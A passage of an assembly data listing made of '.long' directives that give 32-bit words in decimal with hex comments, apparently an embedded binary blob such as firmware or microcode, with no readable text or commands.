0xc820d42 .long 4289988738 ; 0xffb40882 .long 4061174170 ; 0xf210999a .long 3223366265 ; 0xc020aa79 .long 1962945024 ; 0x75002a00 .long 2466430976 ; 0x9302c000 .long 2846552584 ; 0xa9aaf208 .long 2838622728 ; 0xa931f208 .long 220334498 ; 0xd2209a2 .long 142740610 ; 0x8820c82 .long 2577924020 ; 0x99a7ffb4 .long 2846814728 ; 0xa9aef208 .long 2838622728 ; 0xa931f208 .long 220334498 ; 0xd2209a2 .long 142740610 ; 0x8820c82 .long 2579234740 ; 0x99bbffb4 .long 2441134080 ; 0x9180c000 .long 2846552584 ; 0xa9aaf208 .long 2838622728 ; 0xa931f208 .long 220334530 ; 0xd2209c2 .long 142740610 ; 0x8820c82 .long 2574516148 ; 0x9973ffb4 .long 1133295392 ; 0x438cb720 .long 3238068739 ; 0xc1010203 .long 1962945024 ; 0x75002a00 .long 2434973697 ; 0x9122c001 .long 2833963592 ; 0xa8eada48 .long 2841899528 ; 0xa963f208 .long 687787775 ; 0x28feceff .long 1133294880 ; 0x438cb520 .long 2834160200 ; 0xa8edda48 .long 2842227210 ; 0xa968f20a .long 3793771664 ; 0xe2205c90 .long 4060643499 ; 0xf20880ab .long 33794407 ; 0x203a967 .long 3254802572 ; 0xc200588c .long 4077935116 ; 0xf3105a0c .long 3792732705 ; 0xe2108221 .long 4060643491 ; 0xf20880a3 .long 4060651746 ; 0xf208a0e2 .long 4060652137 ; 0xf208a269 .long 4061176037 ; 0xf210a0e5 .long 4061176002 ; 0xf210a0c2 .long 4061176009 ; 0xf210a0c9 .long 3221332557 ; 0xc001a24d .long 4061171776 ; 0xf2109040 .long 4061178489 ; 0xf210aa79 .long 3223365825 ; 0xc020a8c1 .long 1962945024 ; 0x75002a00 .long 4061137088 ; 0xf21008c0 .long 3221266625 ; 0xc000a0c1 .long 4060647810 ; 0xf2089182 .long 4060654121 ; 0xf208aa29 .long 169912493 ; 0xa20a8ad .long 2720657928 ; 0xa229f208 .long 3221227680 ; 0xc00008a0 .long 4060647744 ; 0xf2089140 .long 4060654121 ; 0xf208aa29 .long 172009645 ; 0xa40a8ad .long 2720657928 ; 0xa229f208 .long 4060612800 ; 0xf20808c0 .long 3078660269 ; 0xb780a0ad .long 3489350540 ; 0xcffb438c .long 3221826174 ; 0xc0092a7e .long 3045079552 ; 0xb5803a00 .long 3078636428 ; 0xb780438c .long 1962954124 ; 0x75004d8c .long 2437070848 ; 0x9142c000 .long 209895488 ; 0xc82c040 .long 3221271681 ; 0xc000b481 .long 167952897 ; 0xa02c201 .long 3221271681 ; 0xc000b481 .long 1133295488 ; 0x438cb780 .long 704692232 ; 0x2a00c008 .long 3221255424 ; 0xc0007500 .long 3239154530 ; 0xc1119362 .long 3226339586 ; 0xc04e0902 .long 233965888 ; 0xdf20940 .long 218237314 ; 0xd020982 .long 2610298804 ; 0x9b95ffb4 .long 151175441 ; 0x902c111 .long 155238438 ; 0x940c026 .long 159518198 ; 0x9820df6 .long 222478340 ; 0xd42c004 .long 2609643444 ; 0x9b8bffb4 .long 1133295488 ; 0x438cb780 .long 712888310 ; 0x2a7dcff6 .long 1133294976 ; 0x438cb580 .long 1133295488 ; 0x438cb780 .long 704692352 ; 0x2a00c080 .long 3221255424 ; 0xc0007500 .long 3076559298 ; 0xb76091c2 .long 3122348434 ; 0xba1b4192 .long 3222552579 ; 0xc0144003 .long 3078658687 ; 0xb7809a7f .long 3481158540 ; 0xcf7e438c .long 3045075581 ; 0xb5802a7d .long 3078636428 ; 0xb780438c .long 3222291340 ; 0xc010438c .long 1962945024 ; 0x75002a00 .long 2481111041 ; 0x93e2c001 .long 151175457 ; 0x902c121 .long 155238414 ; 0x940c00e .long 159518110 ; 0x9820d9e .long 4289989890 ; 0xffb40d02 .long 3240205124 ; 0xc1219b44 .long 3230009602 ; 0xc0860902 .long 228723008 ; 0xda20940 .long 218237314 ; 0xd020982 .long 2604400564 ; 0x9b3bffb4 .long 2121578335 ; 0x7e74b75f .long 3221321344 ; 0xc0017680 .long 4061171714 ; 0xf2109002 .long 708881017 ; 0x2a40aa79 .long 3221255424 ; 0xc0007500 .long 3240203074 ; 0xc1219342 .long 3221358850 ; 0xc0020902 .long 228985088 ; 0xda60900 .long 218499458 ; 0xd060982 .long 2603089844 ; 0x9b27ffb4 .long 151175457 ; 0x902c121 .long 151044224 ; 0x900c080 .long 159518118 ; 0x9820da6 .long 4289989910 ; 0xffb40d16 .long 3078658846 ; 0xb7809b1e .long 3223405452 ; 0xc021438c .long 3045079552 ; 0xb5803a00 .long 3078636428 ; 0xb780438c .long 3488498572 ; 0xcfee438c .long 3223333501 ; 0xc0202a7d .long 3045079552 ; 0xb5803a00 .long 3078636428 ; 0xb780438c .long 3355460492 ; 0xc800438c .long 1962945024 ; 0x75002a00 .long 2462236672 ; 0x92c2c000 .long 2104276895 ; 0x7d6cb79f .long 1100134240 ; 0x4192b760 .long 2843406864 ; 0xa97af210 .long 3122332041 ; 0xba1b0189 .long 1561411587 ; 0x5d114003 .long 755256580 ; 0x2d044d04 .long 2614493108 ; 0x9bd5ffb4 .long 1133295488 ; 0x438cb780 .long 712951806 ; 0x2a7ec7fe .long 1133294976 ; 0x438cb580 .long 1133295488 ; 0x438cb780 .long 704692736 ; 0x2a00c200 .long 3221255424 ; 0xc0007500 .long 226922690 ; 0xd8690c2 .long 4289988994 ; 0xffb40982 .long 3078658614 ; 0xb7809a36 .long 3225502604 ; 0xc041438c .long 1962945024 ; 0x75002a00 .long 2470625280 ; 0x9342c000 .long 151175425 ; 0x902c101 .long 155238402 ; 0x940c002 .long 159518118 ; 0x9820da6 .long 4289989890 ; 0xffb40d02 .long 3238107866 ; 0xc1019ada .long 3229616386 ; 0xc0800902 .long 228985152 ; 0xda60940 .long 219285890 ; 0xd120982 .long 2597453748 ; 0x9ad1ffb4 .long 1133295488 ; 0x438cb780 .long 712953791 ; 0x2a7ecfbf .long 1133294976 ; 0x438cb580 .long 1133295392 ; 0x438cb720 .long 3221815811 ; 0xc0090203 .long 1962945024 ; 0x75002a00 .long 2437070849 ; 0x9142c001 .long 151175425 ; 0x902c101 .long 155238414 ; 0x940c00e .long 687788023 ; 0x28fecff7 .long 1133294880 ; 0x438cb520 .long 159518110 ; 0x9820d9e .long 4289989890 ; 0xffb40d02 .long 4061174454 ; 0xf2109ab6 .long 3223366265 ; 0xc020aa79 .long 1962945024 ; 0x75002a00 .long 2443362304 ; 0x91a2c000 .long 151175425 ; 0x902c101 .long 155238406 ; 0x940c006 .long 159518114 ; 0x9820da2 .long 4289989890 ; 0xffb40d02 .long 3221265062 ; 0xc0009aa6 .long 3238105440 ; 0xc1019160 .long 3230009602 ; 0xc0860902 .long 228723008 ; 0xda20940 .long 218237314 ; 0xd020982 .long 2593914804 ; 0x9a9bffb4 .long 151175617 ; 0x902c1c1 .long 155238406 ; 0x940c006 .long 159518158 ; 0x9820dce .long 4289989890 ; 0xffb40d02 .long 3222575114 ; 0xc014980a .long 3224410562 ; 0xc03099c2 .long 3032550538 ; 0xb4c10c8a .long 3078668288 ; 0xb780c000 .long 210259340 ; 0xc884d8c .long 3221271681 ; 0xc000b481 .long 142789633 ; 0x882cc01 .long 3022068872 ; 0xb4211c88 .long 3224682496 ; 0xc034c000 .long 3072367577 ; 0xb7209bd9 .long 3492892044 ; 0xd0314d8c .long 1962945040 ; 0x75002a10 .long 3042904322 ; 0xb55f0902 .long 3221258092 ; 0xc0007f6c .long 3292172738 ; 0xc43a91c2 .long 3032550530 ; 0xb4c10c82 .long 2969878528 ; 0xb104c000 .long 3222356512 ; 0xc0114220 .long 3225041408 ; 0xc03a3a00 .long 3028356226 ; 0xb4810c82 .long 3524378624 ; 0xd211c000 .long 1962945040 ; 0x75002a10 .long 2470625280 ; 0x9342c000 .long 210420816 ; 0xc8ac450 .long 3221271745 ; 0xc000b4c1 .long 1111535874 ; 0x4240b102 .long 3222183507 ; 0xc00e9e53 .long 3045009916 ; 0xb57f29fc .long 8879980 ; 0x877f6c .long 3032554628 ; 0xb4c11c84 .long 2969878528 ; 0xb104c000 .long 705708576 ; 0x2a104220 .long 3221255424 ; 0xc0007500 .long 1485869220 ; 0x589090a4 .long 2137830719 ; 0x7f6cb53f .long 1124906880 ; 0x430cb780 .long 210419760 ; 0xc8ac030 .long 1301067136 ; 0x4d8cb580 .long 3221271745 ; 0xc000b4c1 .long 167954433 ; 0xa02c801 .long 167821314 ; 0xa00c002 .long 3221271681 ; 0xc000b481 .long 3221489854 ; 0xc00408be .long 3022064788 ; 0xb4210c94 .long 3233857536 ; 0xc0c0c000 .long 4289990018 ; 0xffb40d82 .long 3076561440 ; 0xb7609a20 .long 3078635794 ; 0xb7804112 .long 2661565068 ; 0x9ea4428c .long 3072367714 ; 0xb7209c62 .long 3224651404 ; 0xc034468c .long 1485900974 ; 0x58910cae .long 3221271585 ; 0xc000b421 .long 1962936834 ; 0x75000a02 .long 2453979136 ; 0x9244c000 .long 2137831231 ; 0x7f6cb73f .long 3221255232 ; 0xc0007440 .long 3492909474 ; 0xd03191a2 .long 692128030 ; 0x2941091e .long 159518186 ; 0x9820dea .long 423628034 ; 0x19400d02 .long 956350753 ; 0x3900c121 .long 2585132980 ; 0x9a15ffb4 .long 2569584660 ; 0x9928c014 .long 1745401733 ; 0x6808b785 .long 3078649088 ; 0xb7807500 .long 3221243788 ; 0xc000478c .long 712609954 ; 0x2a7990a2 .long 1745401285 ; 0x6808b5c5 .long 209895486 ; 0xc82c03e .long 3221271681 ; 0xc000b481 .long 1351399296 ; 0x508cb780 .long 3072362242 ; 0xb7208702 .long 243417482 ; 0xe82418a .long 2112140639 ; 0x7de4b55f .long 1962945032 ; 0x75002a08 .long 3038775428 ; 0xb5200884 .long 3221242250 ; 0xc000418a .long 3072365410 ; 0xb7209362 .long 3072351244 ; 0xb7205c0c .long 3507569298 ; 0xd1114292 .long 3657959960 ; 0xda080a18 .long 210020481 ; 0xc84a881 .long 3122961996 ; 0xba249e4c .long 1485914114 ; 0x58914002 .long 3038802178 ; 0xb5207102 .long 3221242514 ; 0xc0004292 .long 3078656312 ; 0xb7809138 .long 3047178762 ; 0xb5a0420a .long 168051346 ; 0xa044292 .long 1107998080 ; 0x420ab580 .long 2104801087 ; 0x7d74b73f .long 4292965952 ; 0xffe17640 .long 3078656258 ; 0xb7809102 .long 3556721548 ; 0xd3ff438c .long 4292967742 ; 0xffe17d3e .long 3076493380 ; 0xb75f9044 .long 1954578284 ; 0x74807f6c .long 2477064160 ; 0x93a4ffe0 .long 2096019359 ; 0x7ceeb79f .long 2104407999 ; 0x7d6eb7bf .long 2112796639 ; 0x7deeb7df .long 2121185279 ; 0x7e6eb7ff .long 2355150850 ; 0x8c60c002 .long 2785385506 ; 0xa6059c22 .long 2216738820 ; 0x8420c004 .long 211994665 ; 0xca2c829 .long 211862734 ; 0xca0c4ce .long 2889728048 ; 0xac3dc030 .long 2365645107 ; 0x8d00e133 .long 2757607480 ; 0xa45dc038 .long 2889728048 ; 0xac3dc030 .long 2757607480 ; 0xa45dc038 .long 2889728016 ; 0xac3dc010 .long 2757607448 ; 0xa45dc018 .long 2888155152 ; 0xac25c010 .long 2756034584 ; 0xa445c018 .long 1157936960 ; 0x4504b740 .long 2856448000 ; 0xaa41f000 .long 1544337312 ; 0x5c0cb7a0 .long 3254820397 ; 0xc2009e2d .long 3499317768 ; 0xd0935a08 .long 2661878080 ; 0x9ea90940 .long 2842550304 ; 0xa96de020 .long 3221753282 ; 0xc0080dc2 .long 163712322 ; 0x9c20d42 .long 2608332692 ; 0x9b77ff94 .long 1577891712 ; 0x5e0cb780 .long 2829185544 ; 0xa8a1f208 .long 4060644610 ; 0xf2088502 .long 4060653734 ; 0xf208a8a6 .long 4060651779 ; 0xf208a103 .long 4060651653 ; 0xf208a085 .long 4060653865 ; 0xf208a929 .long 4060651658 ; 0xf208a08a .long 4060653870 ; 0xf208a92e .long 4060653746 ; 0xf208a8b2 .long 4064846093 ; 0xf248a10d .long 4060653745 ; 0xf208a8b1 .long 4060651794 ; 0xf208a112 .long 4060651670 ; 0xf208a096 .long 151691418 ; 0x90aa09a .long 210944054 ; 0xc92c036 .long 4064807104 ; 0xf24808c0 .long 3024199813 ; 0xb441a085 .long 169263104 ; 0xa16c000 .long 3028360332 ; 0xb4811c8c .long 4029792256 ; 0xf031c000 .long 3778120704 ; 0xe1318c00 .long 2661518720 ; 0x9ea38d80 .long 2147267935 ; 0x7ffcb55f .long 3110079746 ; 0xb9600d02 .long 4060627064 ; 0xf2084078 .long 2646253827 ; 0x9dbaa103 .long 1561186594 ; 0x5d0dd122 .long 4029259309 ; 0xf0299e2d .long 3490883813 ; 0xd012a8e5 .long 1552428206 ; 0x5c882cae .long 1493750054 ; 0x5908d126 .long 3761806922 ; 0xe0389e4a .long 218409549 ; 0xd04aa4d .long 1353197756 ; 0x50a828bc .long 2722181698 ; 0xa2413242 .long 2445410303 ; 0x91c1ffff .long 2858545168 ; 0xaa61f010 .long 210681910 ; 0xc8ec036 .long 3221271681 ; 0xc000b481 .long 2146219839 ; 0x7fecb73f .long 3022068868 ; 0xb4211c84 .long 3224682496 ; 0xc034c000 .long 3355548411 ; 0xc8019afb .long 3239184578 ; 0xc11208c2 .long 3356035216 ; 0xc8090890 .long 3320973890 ; 0xc5f20a42 .long 3224504848 ; 0xc0320a10 .long 3045067966 ; 0xb5800cbe .long 3022078604 ; 0xb421428c .long 171884544 ; 0xa3ec000 .long 3028356320 ; 0xb4810ce0 .long 142786560 ; 0x882c000 .long 214352000 ; 0xcc6c080 .long 3221271585 ; 0xc000b421 .long 172148737 ; 0xa42c801 .long 169394450 ; 0xa18c112 .long 214089778 ; 0xcc2c032 .long 3221271681 ; 0xc000b481 .long 215746752 ; 0xcdc08c0 .long 3221271585 ; 0xc000b421 .long 3229616642 ; 0xc0800a02 .long 3028356294 ; 0xb4810cc6 .long 3355557888 ; 0xc801c000 .long 3239315650 ; 0xc11408c2 .long 3224504464 ; 0xc0320890 .long 3022064838 ; 0xb4210cc6 .long 172277760 ; 0xa44c000 .long 3028356312 ; 0xb4810cd8 .long 142786560 ; 0x882c000 .long 214352000 ; 0xcc6c080 .long 3221271585 ; 0xc000b421 .long 172148737 ; 0xa42c801 .long 169394452 ; 0xa18c114 .long 214614066 ; 0xccac032 .long 3221271681 ; 0xc000b481 .long 215222472 ; 0xcd408c8 .long 3221271585 ; 0xc000b421 .long 3229616642 ; 0xc0800a02 .long 3028356294 ; 0xb4810cc6 .long 3080699904 ; 0xb79fc000 .long 3082779374 ; 0xb7bf7aee .long 3221519214 ; 0xc0047b6e .long 2619509856 ; 0x9c228c60 .long 3221293186 ; 0xc0010882 .long 3274837138 ; 0xc3320c92 .long 3022064772 ; 0xb4210c84 .long 3078668288 ; 0xb780c000 .long 2269006988 ; 0x873e4c8c .long 3225422352 ; 0xc0400a10 .long 3078659211 ; 0xb7809c8b .long 2619523640 ; 0x9c22c238 .long 1183627136 ; 0x468cb780 .long 3222014528 ; 0xc00c0a40 .long 3045094688 ; 0xb5807520 .long 3007334028 ; 0xb340468c .long 2231519412 ; 0x850248b4 .long 1184675136 ; 0x469cb540 .long 3078659106 ; 0xb7809c22 .long 4060630156 ; 0xf2084c8c .long 4060653717 ; 0xf208a895 .long 4060653710 ; 0xf208a88e .long 4060653829 ; 0xf208a905 .long 4069042589 ; 0xf288a99d .long 4060653830 ; 0xf208a906 .long 4060651677 ; 0xf208a09d .long 4060651670 ; 0xf208a096 .long 4060651789 ; 0xf208a10d .long 4060651909 ; 0xf208a185 .long 4060653721 ; 0xf208a899 .long 4060653714 ; 0xf208a892 .long 4064848137 ; 0xf248a909 .long 4064848257 ; 0xf248a981 .long 4060651649 ; 0xf208a081 .long 4060651674 ; 0xf208a09a .long 4060651793 ; 0xf208a111 .long 4069040521 ; 0xf288a189 .long 4064848001 ; 0xf248a881 .long 4064848277 ; 0xf248a995 .long 4064848030 ; 0xf248a89e .long 4069042445 ; 0xf288a90d .long 4064845957 ; 0xf248a085 .long 4064846221 ; 0xf248a18d .long 4069042585 ; 0xf288a999 .long 4064845954 ; 0xf248a082 .long 4064846101 ; 0xf248a115 .long 4064848017 ; 0xf248a891 .long 4069040529 ; 0xf288a191 .long 4069042569 ; 0xf288a989 .long 4064848026 ; 0xf248a89a .long 4069040281 ; 0xf288a099 .long 4064846090 ; 0xf248a10a .long 4069040541 ; 0xf288a19d .long 4069042589 ; 0xf288a99d .long 4069040286 ; 0xf288a09e .long 4069042325 ; 0xf288a895 .long 4069042322 ; 0xf288a892 .long 4069042445 ; 0xf288a90d .long 4069040281 ; 0xf288a099 .long 4069040278 ; 0xf288a096 .long 4069040401 ; 0xf288a111 .long 2619515277 ; 0x9c22a18d .long 3355551245 ; 0xc801a60d .long 3406826050 ; 0xcb100a42 .long 3224504832 ; 0xc0320a00 .long 3028356330 ; 0xb4810cea .long 3355557888 ; 0xc801c000 .long 3222276290 ; 0xc01008c2 .long 209979528 ; 0xc840888 .long 3221271585 ; 0xc000b421 .long 172146696 ; 0xa42c008 .long 484753410 ; 0x1ce4c002 .long 3221271681 ; 0xc000b481 .long 146980872 ; 0x8c2c008 .long 219070512 ; 0xd0ec030 .long 3221271586 ; 0xc000b422 .long 209896528 ; 0xc82c450 .long 440451080 ; 0x1a40c008 .long 3221271681 ; 0xc000b481 .long 1109438721 ; 0x4220b101 .long 952156162 ; 0x38c0c002 .long 1309455648 ; 0x4e0cb520 .long 209895504 ; 0xc82c050 .long 3221271585 ; 0xc000b421 .long 226672832 ; 0xd82c0c0 .long 3221752210 ; 0xc0080992 .long 3221753090 ; 0xc0080d02 .long 4292086018 ; 0xffd40902 .long 3293616312 ; 0xc45098b8 .long 167906438 ; 0xa020c86 .long 3221271681 ; 0xc000b481 .long 1109438724 ; 0x4220b104 .long 167952392 ; 0xa02c008 .long 219070512 ; 0xd0ec030 .long 3221271682 ; 0xc000b482 .long 3221752964 ; 0xc0080c84 .long 3028359680 ; 0xb4811a00 .long 2969944064 ; 0xb105c000 .long 3263185440 ; 0xc2804220 .long 3355531829 ; 0xc8015a35 .long 146802818 ; 0x8c00882 .long 721207310 ; 0x2afcc00e .long 1519436416 ; 0x5a90c280 .long 726585458 ; 0x2b4ed072 .long 3224411821 ; 0xc0309ead .long 3022064778 ; 0xb4210c8a .long 172146688 ; 0xa42c000 .long 3028356228 ; 0xb4810c84 .long 2000732160 ; 0x7740c000 .long 1577891776 ; 0x5e0cb7c0 .long 2416099329 ; 0x9002c001 .long 249483313 ; 0xeded031 .long 159518186 ; 0x9820dea .long 717294850 ; 0x2ac10d02 .long 424726609 ; 0x1950d051 .long 956350753 ; 0x3900c121 .long 2550923188 ; 0x980bffb4 .long 2848387656 ; 0xa9c6f248 .long 3263168907 ; 0xc280018b .long 444881549 ; 0x1a845a8d .long 3223428778 ; 0xc0219eaa .long 4287905024 ; 0xff943d00 .long 4064844141 ; 0xf248996d .long 3490753093 ; 0xd010aa45 .long 38409948 ; 0x24a16dc .long 2722493000 ; 0xa245f248 .long 210158672 ; 0xc86c450 .long 3028355586 ; 0xb4810a02 .long 2969878528 ; 0xb104c000 .long 174998048 ; 0xa6e4220 .long 211730484 ; 0xc9ec034 .long 3221271681 ; 0xc000b481 .long 1544337184 ; 0x5c0cb720 .long 2856710728 ; 0xaa45f248 .long 1177925408 ; 0x4635b720 .long 423678035 ; 0x1940d053 .long 2292970000 ; 0x88abf210 .long 211992704 ; 0xca2c080 .long 1510785664 ; 0x5a0cc280 .long 1108129152 ; 0x420cb580 .long 3221271713 ; 0xc000b4a1 .long 1510520709 ; 0x5a08b785 .long 3221452032 ; 0xc0037500 .long 3072430690 ; 0xb7219262 .long 3078707468 ; 0xb781590c .long 3224393612 ; 0xc030578c .long 168066112 ; 0xa047c40 .long 1468839297 ; 0x578cb581 .long 2424487936 ; 0x9082c000 .long 2562965556 ; 0x98c3c034 .long 1401730848 ; 0x538cb720 .long 1102427936 ; 0x41b5b720 .long 1468839809 ; 0x578cb781 .long 1143846720 ; 0x442db740 .long 1648598601 ; 0x62439e49 .long 3221254404 ; 0xc0007104 .long 2231799992 ; 0x850690b8 .long 1612232005 ; 0x6018b545 .long 1527297925 ; 0x5b08b785 .long 3080746240 ; 0xb7a07500 .long 3221249684 ; 0xc0005e94 .long 3080753762 ; 0xb7a09262 .long 4061156620 ; 0xf210550c .long 4060653629 ; 0xf208a83d .long 226929057 ; 0xd86a9a1 .long 2623708804 ; 0x9c629e84 .long 2686579208 ; 0xa021f208 .long 2821059152 ; 0xa825f250 .long 159817387 ; 0x9869eab .long 2623708804 ; 0x9c629e84 .long 1527297925 ; 0x5b08b785 .long 3221255424 ; 0xc0007500 .long 3076559204 ; 0xb7609164 .long 4061156628 ; 0xf2105514 .long 2659493925 ; 0x9e84a825 .long 42048610 ; 0x2819c62 .long 2451619840 ; 0x9220c000 .long 1518909317 ; 0x5a88b785 .long 3221255424 ; 0xc0007500 .long 3078656258 ; 0xb7809102 .long 4060632588 ; 0xf208560c .long 3221269121 ; 0xc000aa81 .long 3078656192 ; 0xb78090c0 .long 4060632716 ; 0xf208568c .long 3072371341 ; 0xb720aa8d .long 3078641932 ; 0xb780590c .long 1962950953 ; 0x75004129 .long 3221226243 ; 0xc0000303 .long 3078984292 ; 0xb7859264 .long 1962957576 ; 0x75005b08 .long 2428813312 ; 0x90c4c000 .long 2854351440 ; 0xaa21f250 .long 2623708836 ; 0x9c629ea4 .long 1109178176 ; 0x421cb740 .long 2855662096 ; 0xaa35f210 .long 2309219104 ; 0x89a3e320 .long 2623708836 ; 0x9c629ea4 .long 2855924240 ; 0xaa39f210 .long 26058411 ; 0x18d9eab .long 2623708836 ; 0x9c629ea4 .long 1418508160 ; 0x548cb780 .long 212254848 ; 0xca6c080 .long 2861683400 ; 0xaa91d2c8 .long 3221271713 ; 0xc000b4a1 .long 227721218 ; 0xd92c002 .long 2615476148 ; 0x9be4ffb4 .long 4294930442 ; 0xffff700a .long 226923364 ; 0xd869364 .long 218761666 ; 0xd0a09c2 .long 151175457 ; 0x902c121 .long 2563243924 ; 0x98c7ff94 .long 1544337280 ; 0x5c0cb780 .long 2844979784 ; 0xa992f248 .long 218284193 ; 0xd02c0a1 .long 163712260 ; 0x9c20d04 .long 2561867668 ; 0x98b2ff94 .long 226672832 ; 0xd82c0c0 .long 222431634 ; 0xd420992 .long 4289988930 ; 0xffb40942 .long 172137394 ; 0xa429bb2 .long 210681904 ; 0xc8ec030 .long 3221271681 ; 0xc000b481 .long 2129573791 ; 0x7eeeb79f .long 2137962431 ; 0x7f6eb7bf .long 2146351071 ; 0x7feeb7df .long 2619509856 ; 0x9c228c60 .long 1544337152 ; 0x5c0cb700 .long 201488064 ; 0xc0276c0 .long 3221228930 ; 0xc0000d82 .long 3078656834 ; 0xb7809342 .long 3509666700 ; 0xd131438c .long 3072329856 ; 0xb7200880 .long 3036692531 ; 0xb5004033 .long 3036696468 ; 0xb5004f94 .long 3036696596 ; 0xb5005014 .long 747129236 ; 0x2c884994 .long 3456071232 ; 0xcdff7640 .long 3045075582 ; 0xb5802a7e .long 2233615244 ; 0x8522438c .long 2422390784 ; 0x9062c000 .long 3040904466 ; 0xb5408512 .long 1958759324 ; 0x74c04b9c .long 1519695680 ; 0x5a94b740 .long 2464333824 ; 0x92e2c000 .long 1133295488 ; 0x438cb780 .long 3624961282 ; 0xd8108502 .long 3040913601 ; 0xb540a8c1 .long 3040890908 ; 0xb540501c .long 3040953116 ; 0xb541431c .long 3040893596 ; 0xb5405a9c .long 3040889884 ; 0xb5404c1c .long 3038792092 ; 0xb520499c .long 3456061324 ; 0xcdff4f8c .long 3045075582 ; 0xb5802a7e .long 3509666700 ; 0xd131438c .long 3072329856 ; 0xb7200880 .long 3078635571 ; 0xb7804033 .long 3490857740 ; 0xd012430c .long 8989716 ; 0x892c14 .long 704692232 ; 0x2a00c008 .long 3489297664 ; 0xcffa7500 .long 3038783741 ; 0xb52028fd .long 3221242636 ; 0xc000430c .long 3078656706 ; 0xb78092c2 .long 1979728780 ; 0x7600438c .long 973129728 ; 0x3a00c800 .long 1133294976 ; 0x438cb580 .long 2430910464 ; 0x90e4c000 .long 3041232134 ; 0xb5458506 .long 3221253144 ; 0xc0006c18 .long 3078983936 ; 0xb7859100 .long 226913288 ; 0xd866c08 .long 3045407240 ; 0xb5853a08 .long 3074780168 ; 0xb7456c08 .long 3490802696 ; 0xd0116c08 .long 1962945058 ; 0x75002a22 .long 2432876544 ; 0x9102c000 .long 1133295488 ; 0x438cb780 .long 973127696 ; 0x3a00c010 .long 1133294976 ; 0x438cb580 .long 1275901824 ; 0x4c0cb780 .long 3221255424 ; 0xc0007500 .long 3078656226 ; 0xb78090e2 .long 712590092 ; 0x2a79430c .long 1124906368 ; 0x430cb580 .long 1125431072 ; 0x4314b720 .long 1267513120 ; 0x4b8cb720 .long 2030214732 ; 0x79029e4c .long 707711985 ; 0x2a2ed3f1 .long 1510326784 ; 0x5a05c200 .long 1812510085 ; 0x6c08b585 .long 2432876544 ; 0x9102c000 .long 1041289745 ; 0x3e10d211 .long 1124906368 ; 0x430cb580 .long 2428551168 ; 0x90c0c000 .long 754831350 ; 0x2cfdcff6 .long 1125430560 ; 0x4314b520 .long 1125431072 ; 0x4314b720 .long 772854033 ; 0x2e10d111 .long 3221255424 ; 0xc0007500 .long 2231799970 ; 0x850690a2 .long 1243395392 ; 0x4a1cb540 .long 3500307968 ; 0xd0a27600 .long 142761501 ; 0x8825e1d .long 143839234 ; 0x892d002 .long 2030184964 ; 0x79022a04 .long 2432876544 ; 0x9102c000 .long 1041289489 ; 0x3e10d111 .long 1124906368 ; 0x430cb580 .long 2434842624 ; 0x9120c000 .long 3221255872 ; 0xc00076c0 .long 3223359682 ; 0xc02090c2 .long 3038788736 ; 0xb5203c80 .long 3072344852 ; 0xb7204314 .long 3490792204 ; 0xd011430c .long 1962945042 ; 0x75002a12 .long 2430779392 ; 0x90e2c000 .long 1267513216 ; 0x4b8cb780 .long 3221238296 ; 0xc0003218 .long 3078656192 ; 0xb78090c0 .long 1249725324 ; 0x4a7d4b8c .long 3045073432 ; 0xb5802218 .long 3072344844 ; 0xb720430c .long 3490792204 ; 0xd011430c .long 1962945044 ; 0x75002a14 .long 2432876544 ; 0x9102c000 .long 974311441 ; 0x3a12d011 .long 1124906368 ; 0x430cb580 .long 2426454016 ; 0x90a0c000 .long 3038783737 ; 0xb52028f9 .long 3624944396 ; 0xd810430c .long 3074468033 ; 0xb740a8c1 .long 3624947612 ; 0xd8104f9c .long 3792742981 ; 0xe210aa45 .long 3254814883 ; 0xc20088a3 .long 1883789841 ; 0x70485a11 .long 2419507203 ; 0x9036c003 .long 168349969 ; 0xa08d111 .long 2827147784 ; 0xa882da08 .long 1124906784 ; 0x430cb720 .long 1233958720 ; 0x498cb740 .long 2655804561 ; 0x9e4c5c91 .long 1133819712 ; 0x4394b740 .long 3038787720 ; 0xb5203888 .long 1887978252 ; 0x7088430c .long 1023459584 ; 0x3d00c100 .long 1133819200 ; 0x4394b540 .long 2457387008 ; 0x9278c000 .long 1519171361 ; 0x5a8cb721 .long 1950391892 ; 0x74409e54 .long 973389825 ; 0x3a04c001 .long 1133294976 ; 0x438cb580 .long 2435104768 ; 0x9124c000 .long 1023721489 ; 0x3d04c011 .long 1133819200 ; 0x4394b540 .long 3040969990 ; 0xb5418506 .long 3507640988 ; 0xd1125a9c .long 3078621324 ; 0xb780088c .long 3072344139 ; 0xb720404b .long 3254800268 ; 0xc2004f8c .long 1883789841 ; 0x70485a11 .long 2434187264 ; 0x9116c000 .long 1133295488 ; 0x438cb780 .long 974176257 ; 0x3a10c001 .long 1133294976 ; 0x438cb580 .long 1078704000 ; 0x404bb780 .long 1511113216 ; 0x5a11c200 .long 1883773448 ; 0x70481a08 .long 2434187264 ; 0x9116c000 .long 1133295488 ; 0x438cb780 .long 977321985 ; 0x3a40c001 .long 1133294976 ; 0x438cb580 .long 1343534880 ; 0x5014b720 .long 168349969 ; 0xa08d111 .long 2827082248 ; 0xa881da08 .long 1485938252 ; 0x58919e4c .long 3221254402 ; 0xc0007102 .long 3078656258 ; 0xb7809102 .long 3221570444 ; 0xc005438c .long 3045079552 ; 0xb5803a00 .long 3078636428 ; 0xb780438c .long 3229893516 ; 0xc084438c .long 3045079552 ; 0xb5803a00 .long 3221242764 ; 0xc000438c .long 3078656416 ; 0xb78091a0 .long 3072344844 ; 0xb720430c .long 712328076 ; 0x2a75438c .long 1124906368 ; 0x430cb580 .long 687722490 ; 0x28fdcffa .long 1133294880 ; 0x438cb520 .long 1124906816 ; 0x430cb740 .long 690155538 ; 0x2922f012 .long 2432876544 ; 0x9102c000 .long 1133295488 ; 0x438cb780 .long 973127808 ; 0x3a00c080 .long 1133294976 ; 0x438cb580 .long 1233958784 ; 0x498cb780 .long 1268037408 ; 0x4b94b720 .long 1343010592 ; 0x500cb720 .long 3045067268 ; 0xb5800a04 .long 2655799692 ; 0x9e4c498c .long 142899336 ; 0x8847888 .long 1343010080 ; 0x500cb520 .long 2451750912 ; 0x9222c000 .long 3221255808 ; 0xc0007680 .long 3072364996 ; 0xb72091c4 .long 3490793228 ; 0xd011470c .long 3045079586 ; 0xb5803a22 .long 2231780108 ; 0x8506430c .long 1276949824 ; 0x4c1cb540 .long 3038783737 ; 0xb52028f9 .long 3507570444 ; 0xd111470c .long 3657959944 ; 0xda080a08 .long 3072370817 ; 0xb720a881 .long 3221377044 ; 0xc0025014 .long 3229620416 ; 0xc08018c0 .long 3254803071 ; 0xc2005a7f .long 9984625 ; 0x985a71 .long 3074465356 ; 0xb7409e4c .long 1486046988 ; 0x5893470c .long 3040899330 ; 